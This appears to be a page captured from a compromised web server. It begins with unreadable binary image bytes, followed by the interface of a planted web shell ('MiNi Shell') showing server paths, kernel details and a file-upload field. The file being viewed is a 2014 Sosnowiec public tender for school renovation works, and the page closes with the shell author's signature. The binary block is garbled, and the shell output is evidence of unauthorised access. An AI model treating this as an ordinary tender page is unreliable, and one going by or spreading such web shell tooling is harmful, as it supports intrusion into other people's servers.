JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/128770-N-2014.html

<p class="kh_header"><b>Sosnowiec: Kompleksowa termomodernizacja obiektu Zespołu Szkół Elektronicznych i Informatycznych, ul. Jagiellońska w Sosnowcu - roboty dodatkowe cz. 2</b><br>
<b>Numer ogłoszenia: 128770 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa termomodernizacja obiektu Zespołu Szkół Elektronicznych i Informatycznych, ul. Jagiellońska w Sosnowcu - roboty dodatkowe cz. 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia są dodatkowe roboty budowlane dla zadania pn.: Kompleksowa termomodernizacja obiektu Zespołu Szkół Elektronicznych i Informatycznych, ul. Jagiellońska w Sosnowcu. Zakres robót obejmuje wykonanie robót budowlanych, zagospodarowanie terenu i wymianę instalacji zimnej wody.
2 Szczegółowy zakres zamówienia obejmuje wykonanie:
2.1. Roboty budowlane
2.1.1 Wymiana okładziny sufitowej
- rozebranie drewnianych belek stropowych o przekroju do 300cm2  i długości ok 624,43 mb wraz z wywozem na odległość 12 km i kosztami utylizacji,
- montaż obudowy stropu z blachy trapezowej powlekanej TR6 gr 0,5 mm RAL=9010 o pow. ok. 469,81 m2, bez ocieplenia wraz z konstrukcją rusztu z kształtowników metalowych,  
- montaż okładziny z płyt gipsowo-kartonowych pojedynczej na stropie o pow.  ok. 280,0 m2, wraz z konstrukcją z kształtowników  metalowych 
- wykonanie gładzi gipsowych  na pow. ok. 280,0 m2, gr. 3mm, jednowarstwowych na stropach o podłożu z płyt gipsowych, 
- dwukrotne malowanie farbami emulsyjnymi wewnętrznych powierzchni gipsowych wraz z gruntowaniem na pow. ok. 500.0 m2,
2.1.2 Zabezpieczenie grzejników drabinkami gimnastycznymi 
- dostawa i montaż atestowanych drabinek gimnastycznych z drewna bukowego szer. 90 cm, wys. 300 cm w ilości 26 szt,
- demontaż i ponowny montaż drabinek gimnastycznych drewnianych  szer. 90 cm, wys. 300 cm w ilości 26 szt wraz z wymianą elementów mocujących, naprawą miejsc po wykuciu elementów mocujących drabinki. 
2.1.3 Remont schodów wejściowych do budynku wraz z rampą dla osób niepełnosprawnych
- rozbiórka posadzki z masy lastrykowej o powierzchni ok. 5,54 m2,
- rozbiórka elementów konstrukcji betonowych zbrojonych o objętości ok. 2,21 m3,
- wykonanie schodów żelbetowych o objętości ok. 3,34 m3, wraz z przygotowaniem zbrojenia,
- wykonanie płyty żelbetowej o pow. ok. 22,36m2, gr. 12 cm wraz z przygotowaniem zbrojenia, 
- wykonanie ściany oporowej żelbetowej o objętości ok. 9,83 m3, o przekroju prostokątnym gr. do 15cm wraz z wykonaniem wykopu, podsypki piaskowej, podbudowy betonowej, przygotowaniem i montażem zbrojenia oraz izolacją przeciwwilgociową,
- Wykonanie płyty żelbetowej o pow. ok. 6,13 m2 gr. 14cm wraz z przygotowaniem zbrojenia,    
- ocieplenie ścian płytami styropianowymi gr. 2cm na powierzchni ok. 37,61 m2,
- wykonanie wyprawy elewacyjnej cienkowarstwowej z tynku mineralnego barwionego w masie gr. 2mm, na powierzchni ok.  37,61 m2, wraz z przygotowaniem podłoża, 
- wykonanie nawierzchni z kostki brukowej kolorowej na powierzchni ok. 85,88m2, kostka gr. 6cm  na podsypce cementowo piaskowej wraz z wykonaniem  podbudowy z kruszywa gr. 30 cm, 
- dostawa i montaż poręczy do schodów i pochwytów dla osób niepełnosprawnych  ze stali nierdzewnej o długości ok. 54,64 mb,
- wykonanie posadzki na spoczniku o powierzchni ok. 22,88 m2, z płyt o stosunku obwodu do pow. do 15m/m2 z granitu płomieniowanego,
- okładziny stopni z  granitu płomieniowanego  na dł. ok. 153,90 mb, okładzina gr. do 5cm, szerokość stopni do 40cm. 
2.2 Zagospodarowanie terenu
2.2.1 Ogrodzenie terenu
- rozebranie elementów konstrukcji betonowych zbrojonych o objętości ok 3,75 m3, wraz z wywozem na odległość 12 km i kosztami utylizacji, 
- wykonanie stóp fundamentowych o objętości do 0,5 m3, o objętości ok 23,328  m3, wraz z robotami ziemnymi oraz dwuwarstwową izolacją przeciwwilgociową wykonywaną na zimno z roztworu asfaltowego,            
- montaż podmurówki z elementów prefabrykowanych  w ilości 202 elementów, prostych o dł. 250 cm, wys. 30cm , gr 5cm, wraz z łącznikami prefabrykowanymi, 
- montaż ogrodzenia o powierzchni 1025,15 m2 z paneli systemowych - prętów zgrzewanych zabezpieczonych antykorozyjnie: ocynkowanie + powłoka poliestrowa, słupki systemowe o  profilu prostokątnym 60x40x1,5 mm. Wysokość ogrodzenia 2,03 m, 
- dostawa i montaż samonośnej  bramy systemowej przesuwnej w ilości 2 kpl, wys. 2,03x3,00 m wraz z słupkami, zestawem jezdno - prowadzącym, zestawem zamków, kompletem montażowym, pochwytem do ręcznego otwierania, zabezpieczeniem antykradzieżowym, malowana proszkowo, 
- dostawa i montaż furtki w ilości 2 kpl. wys. 2,03x1,20 m wraz z słupkami, zestawem zawiasowo - zamkowym, klamkami, zabezpieczeniem antykradzieżowym, malowana proszkowo,  
2.2.2 Oświetlenie
- demontaż słupów oświetleniowych parkowych typu K-6,5 w ilości 9 kpl, wraz z fundamentami i oprawami typu OZPR-125,  
- montaż słupów parkowych oświetleniowych stalowych w ilości 9 kpl, o wysokości 4,645m i zewnętrznej warstwie z tworzywa sztucznego w kolorze czarnym wraz z fundamentem, 
- montaż bezpośrednio na słupie opraw oświetleniowych LED w ilości 9 kpl o mocy diod 72W,  
- montaż tabliczek oświetleniowych wnękowych TB11 w ilości 9 kpl. 
2.2.3 Nawierzchnia z kostki betonowej
- rozebranie nawierzchni z mieszanek mineralno - bitumicznych na pow. ok 525,0 m2, gr 5cm wraz z wywozem na odległość 12 km i kosztami utylizacji,
- rozebranie obrzeży betonowych 8x30cm  o dł. ok. 50,0 mb na podsypce piaskowej, 
- wykonanie koryta na pow. ok 525,0 m2 w gruncie kat. III-IV, na głębokość 23cm,wraz z wywozem na odległość 12 km i kosztami utylizacji,
- wykonanie nawierzchni z kostki betonowej kolorowej gr 8cm  na pow. ok 525,0 m2, na podsypce cementowa piaskowej wraz z wykonaniem warstwy z piasku gr 5cm i podbudowy z kruszywa łamanego  gr 15cm,  
- wykonanie rowków pod obrzeża wraz z montażem obrzeży betonowych o dł. ok 50,0 mb, o wymiarach 30x8 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową, 
2.2.4 Elementy małej architektury
- dostawa i montaż ławek w ilości 6 kpl, dł. 180cm , wysokości 70cm, szerokości siedzenia 42 cm - drewno sosnowe impregnowane, pięć desek, podstawa żeliwna,  
- dostawa i montaż koszy na śmieci metalowych w ilości  3 kpl, z słupkiem montażowym i daszkiem, wolnostojących , poj. 35l wraz z podstawą betonową, 
- dostawa i montaż blokad parkingowych  (motylkowych) w ilości 10 kpl - system do zabetonowania wraz z nośnikiem blokady,  
- dostawa i montaż barier w ilości 8szt, o dł. 2m, rama  wykonana   z rurek  fi 35 mm stalowych, ocynkowanych ogniowo i malowanych,  wypełnienie wykonane z  15 szt. prętów  fi 16 mm wys. 924 mm stalowych ocynkowanych ogniowo i malowanych. 
2.3. Wymiana instalacji zimnej wody
- demontaż rurociągu zimnej wody, stalowego, na ścianie o długości ok. 848,0 mb  i  średnicy od 32 mm do 80 mm,  
- przebicia otworów  w ścianach z cegieł w ilości ok. 48 szt, grubości od 1 /1/2 cegły do 2 cegieł  wraz z zamurowaniem, obustronnym  uzupełnieniem tynku i malowaniem,  
- montaż rurociągów stalowych ocynkowanych o połączeniach gwintowanych na ścianach w budynkach niemieszkalnych o długości ok. 848,0 mb i  średnicy nominalnej  od 32 mm do 80 mm wraz  płukaniem instalacji i próbą szczelności,  
- montaż zaworów przelotowych i zwrotnych wodociągowych w ilości ok. 52 szt i średnicy nominalnej  od 32 mm do 80 mm 
- montaż izolacji jednowarstwowej otulinami o długości ok. 848,0 mb,  grubości 6-13mm, rurociągów stalowych ocynkowanych  o średnicy nominalnej  od 32 mm do 80 mm..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 14.500,00 zł (słownie złotych: czternaście tysięcy pięćset 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania  osobami zdolnymi do wykonania zamówienia - ocenione zostanie na podstawie złożonego wraz z ofertą wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, (w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami) wraz z ewentualnym pisemnym zobowiązaniem innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
Zamawiający wymaga, aby Wykonawca dysponował kandydatem na stanowisko kierownika budowy do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, kandydatem na stanowisko kierownika robót do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych, kandydatem na stanowisko kierownika robót do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych, posiadających stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej kierownika robót w w/w specjalnościach  w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane zgodnie z obowiązującym prawem. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,  a w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie  spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust 1 ustawy. W przypadku ustanowienia przez Wykonawcę pełnomocnika, do złożenia oferty należy dołączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z pełnomocnictwa musi wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczgólności do podpisania i złożenia oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>17.2. Zamawiający dopuszcza możliwość zmiany postanowień umowy zawartej z Wykonawcą wyłonionym w toku niniejszego postępowaniu, w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a nie wprowadzenie tych zmian powodowałoby niemożność wykonania przedmiotu zamówienia i osiągnięcia celu zgodnego z dokumentacją projektową dla zaistnienia nw. okoliczności:
1) Zmiana terminu zakończenia zamówienia spowodowanej odbiegającymi od przeciętnych warunkami atmosferycznymi, gdy warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów;
2) Zmiana zakresu robót i wynagrodzenia, jeżeli wystąpią nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne  podmioty. W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu  i wynagrodzenia.
3) Zmiana spowodowana wystąpieniem siły wyższej, czyli zdarzenia, którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań. Jeżeli wykonanie umowy jest niemożliwe z powodu siły wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe. Wykonawca zabezpieczy teren budowy tak szybko jak jest to możliwe i wstrzyma roboty, a Zamawiający zapłaci wynagrodzenie za dotychczas wykonane roboty. 
4) Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji mogą być dokonywane zmiany technologii wykonywania elementów robót; dopuszcza się je tylko w przypadku, gdy proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt, a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonane roboty, w tym przypadku Wykonawca przedstawia protokół konieczności, a następnie dostarcza dokumentację projektową na te roboty. Projekt wymaga zatwierdzenia przez projektanta, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego. Powyższe zmiany nie mogą zmieniać terminu zakończenia robót i wynagrodzenia.
5) W przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, sporządza on protokół konieczności, a następnie dostarcza dokumentację projektową na te roboty. Zmiany techniczne mogą powodować zmianę terminu zakończenia zamówienia podstawowego. 
6) W uzasadnionych przypadkach, gdy realizacja zadania według dokumentacji technicznej i specyfikacji technicznej wykonania i odbioru robót budowlanych powodowałaby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenia zmian w stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót i wynagrodzenia.
7) Na wniosek Wykonawcy i po spełnieniu warunków określonych we wzorze umowy dotyczących podwykonawstwa, Wykonawca może modyfikować w trakcie wykonywania zamówienia złożone w ofercie deklaracje odnośnie podwykonawstwa poprzez: 
- wskazanie innych podwykonawców;
- rezygnację z podwykonawców;
8) Zamawiający dopuszcza możliwość zmiany wynagrodzenia za wykonanie przedmiotu zamówienia na skutek zmiany stawki podatku VAT dokonanej ustawą. Wówczas do kwoty netto zostanie naliczony podatek VAT w wysokości obowiązującej na dzień wystawienia faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu, Wydział Inwestycji Miejskich, ul. Mościckiego 14, pokój 317 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu, Wydział Inwestycji Miejskich, ul. Mościckiego 14, pokój 317 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kompleksowa termomodernizacja obiektu Zespołu Szkół Elektronicznych i Informatycznych, ul. Jagiellońska w Sosnowcu jest projektem współfinansowanym przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.
Kompleksowa termomodernizacja obiektu Zespołu Szkół Elektronicznych i Informatycznych, ul. Jagiellońska w Sosnowcu - roboty dodatkowe cz. 2 niejest finansowane ze środków Unii Europejskiej . Wszystkie roboty budowlane należy prowadzić w porozumieniu z wykonawcą robót podstawowych przy uwzględniuniu harmonogramu rzeczowo - finansowego zadania podstawowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com